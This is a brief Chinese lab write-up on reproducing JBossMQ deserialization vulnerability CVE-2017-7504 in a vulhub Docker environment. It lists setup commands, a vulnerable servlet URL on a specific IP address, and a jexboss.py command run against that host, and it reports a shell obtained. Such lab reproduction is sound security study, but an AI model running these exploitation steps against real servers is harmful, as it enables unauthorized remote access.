JbossMQ反序列化漏洞CVE-2017-7504
1.环境搭建
cd vulhub-master/jboss/CVE-2017-7504
docker-compose up -d
2.访问漏洞地址
JBossMQ HTTP-IL Servlethttp://47.121.211.205:8080/jbossmq-httpil/HTTPServerILServlet
3.运行python文件
python3 jexboss.py -u http://47.121.211.205:8080
成功获取shell